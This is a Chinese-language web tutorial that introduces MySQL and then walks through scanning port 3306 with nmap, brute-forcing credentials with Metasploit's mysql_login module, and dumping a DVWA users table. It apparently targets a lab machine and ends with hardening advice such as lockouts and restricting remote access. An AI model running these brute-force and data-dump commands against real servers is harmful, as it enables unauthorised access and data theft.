6 |
您所在的位置:网站首页 › 甲骨文公司旗下 › 6 |
mysql介绍
Mysql是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于Oracle旗下产品。Mysql 是最流行的关系型数据库管理系统之一,在WEB应用方面,mysql是最好的RDBMS(Relational Database Management System,关系数据库管理系统)应用软件。 每一段内容存储到表当中,多张表进行对应的组合,存储对应的数据,内键、外键、唯一的索引,不同的值,都有对应的联系,这就是我们关系数据库的大概 Mysql是一种关系数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所有数据存放在一个大仓库内,非关系型数据库,mydbs、mongdb,把数据存储到大的内存当中,而不是存储到大的表当中,他们没有表的概念,存储到表当中,是提高了搜索的速度,并且有更强的灵活性 我们可以在mysql官网,查看mysql的信息:https://www.mysql.com/ 探测目标mysql使用nmap -sV -p 3306 IP地址,默认mysql是运行在3306的,探测目标mysql版本信息。 nmap -sV -p 3306 192.168.42.137 msf破解mysql密码使用msf下的mysql_login模块破解mysql登录用户名和密码 msfconsole use auxiliary/scanner/mysql/mysql_login show options set rhosts 192.168.1.105 show options set user_file /home/kali/Desktop/user.txt set pass_file /home/kali/Desktop/PASS.txt show options run当我们拿到mysql用户名密码之后,我们就可以登录到mysql客户端,来查看数据库当中,存储的数据 登录数据库查看数据使用mysql -h IP地址 -u root 登录数据库系统 mysql -h 192.168.1.105 -u root show databases; use dvwa; show tables; select * from users;以上就是我们破解用户名,登录数据库,查看数据 我们之所以能够破解成功,是因为我们的数据库用户名过于简单,用户名使用了root这个用户,以及密码是空密码,或者是其它简单密码,都是很容易被破解出来的,这个时候,我们需要防御这样的探测,就需要将用户名密码,设计的比较复杂,使得不是那么容易被破解,以及可以设计阈值,当我们错误三次登录之后,就会封锁对应的IP,限制登录十分钟,这样就不能很快速的破解,甚至无法破解,我们可以修改mysql默认端口,3306,将它设计成其它端口,迷惑我们的探测,同时,我们不允许mysql外联,只能通过127.0.0.1进行本地连接,否则不进行连接,或者指定具体的IP地址,进行连接,不能任意的IP都能连接到mysql上 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |